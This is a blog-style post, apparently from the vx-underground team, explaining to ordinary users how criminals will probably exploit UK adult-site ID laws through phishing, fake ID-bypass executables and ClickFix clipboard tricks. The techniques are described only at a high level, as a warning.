Can "adult" websites actually "infect" your computer?
Following a post made about the recent UK laws on requiring ID verification to view "adult" websites I saw some posts about how malware (malicious software) is of little consequence to end users. I saw someone say something interesting.
Well, is Runix's statement true? The answer is both: Yes, but well no.
They're correct in the assessment that it isn't 1999 anymore. "Drive by" malware, such as getting malware from simply visiting a website, isn't really a thing anymore (due to improvements in browser and computer security). Furthermore, rootkits don't really exist in the modern cybersecurity ecosystem (different conversation for a different time if you're curious). Moreover, they're also correct in the assessment it is extremely unlikely a Threat Actor will find and abuse a web-browser exploit on a home user (rare and extremely valuable). Regardless of these statements, malware is very much still a threat to end users.
Following the statement from Runix25, user Glaukko made an interesting statement too.
Is Glaukko's assessment correct? Sort of, they're getting closer.
Let's back up first and look at some numbers. Currently vx-underground possesses a "malware ingestion" system whereas we collect malware from the internet. This malware typically targets home users. Sometimes we get lucky and get malware which is designed to target companies. If we're extremely lucky we get malware which is designed to target governments. Our malware ingestion system is extremely primitive. We ingest roughly 25,000 - 100,000 malware payloads a day. However, large companies and organizations, such as Google's VirusTotal ingest (on the conservative end) 200,000 - 1,000,000 malware payloads a day.
Malware is rampant. Malware is everywhere. This malware doesn't come from nowhere. This malware is from online Threat Actors (cybercriminals) who are (usually) financially motivated, with some exceptions such as state-sponsored Threat Actors (malware written from governments to target people, organizations, or other governments).
Malware targeting people who are viewing adult-content is going to be financially motivated criminals. This malware will (probably) lack sophistication and will (probably) aim to steal sensitive documents off your computer (such as Lumma Stealer or Redline Stealer). This is important to note because understanding who is the adversary can help paint a picture on how they're (probably) going to operate.
So how will they do it? Probably one of the following:
All the methods described here are already rampant and usually follow trends. For example, when Ross Ulbricht was released from prison, there were multiple malware campaigns (operations by Threat Actors to target people) aimed to infect people with malware. Likewise, we see malware campaigns which follow events for politicians, video games, movies, adult-content, etc.
Phishing
A Threat Actor will leave comments on social media, on forums, blogs, etc. to advertise a website which allows "ID free adult content". The website will appear to be a legitimate adult content site. The adult site will lie and say it can get you adult content by signing in using e-mail, or social media. It will request you sign in. Social media sites and e-mails nowadays usually have MFA (2FA), so this fake adult website will do additional prompts following your entering your credentials to ensure they can maintain persistent access. Once this is done the fake adult website will "fail" or redirect to a different website. Following this, the Threat Actor will have access to your e-mail, social media, etc. which will then be used for:
Spam campaigns
Cryptocurrency scams
Pivot, use your e-mail to get access to other sensitive content
If you work from home, they'll try to pivot to your work documents
They'll probably also use something like EvilGinx to make their lives easier. EvilGinx, a legitimate tool, is often used to do the exact operation I described. You can read about it here: https://abnormal.ai/blog/cybercriminals-evilginx-mfa-bypass
File Masquerading
You'll (probably) see files online which will appear as .exe files (Windows executables) or APK files (Android apps) which will claim to be ID bypass tools. They'll tell you to run the tool as administrator and to disable any security products on your machine. This sort of file masquerading and social engineering is extremely common with fake video game cheats and fake movies downloads.
Once the user downloads the malicious file, the instructions provided will make it "easy" to run the program. Upon execution the "tool" (malware) will ensure all security programs are disabled. If they're not disabled, it'll try to disable it itself. Subsequently, it'll download the actual malware. They'll probably use something like SmokeLoader
ClickFix (v1 or v2), FileFix
ClickFix (and any variant) is trendy right now. ClickFix is the name of a malicious technique used to trick people into download and executing malware. ClickFix is a fake "authentication" technique. When you visit a website it'll tell you verify you're a human (or "adult") by following a simple guide on the screen. It has been hyper-effective at convincing people to execute malicious code. In essence, visiting the website will load something onto the clipboard (the mechanism on your computer for copying things, CTRL+V shortcut). Then, the website will instruct you to perform basic tasks to authenticate which will detonate the malware.
Examples of ClickFix below:
That is how it'll be done to trick users into executing malware. Likewise, there will be some creativity in this stuff too. Like Glaukko said we'll certainly see scam pop-ups and malicious pop-ups too. The pop-ups will do some of the things I've described above.
They're correct users won't magically get malware. What will happen is users will become frustrated with needing to be identified and go elsewhere for adult content. These "alternatives" will be littered with traps to deliver malware payloads.
Thanks for coming to my Ted Talk
Last updated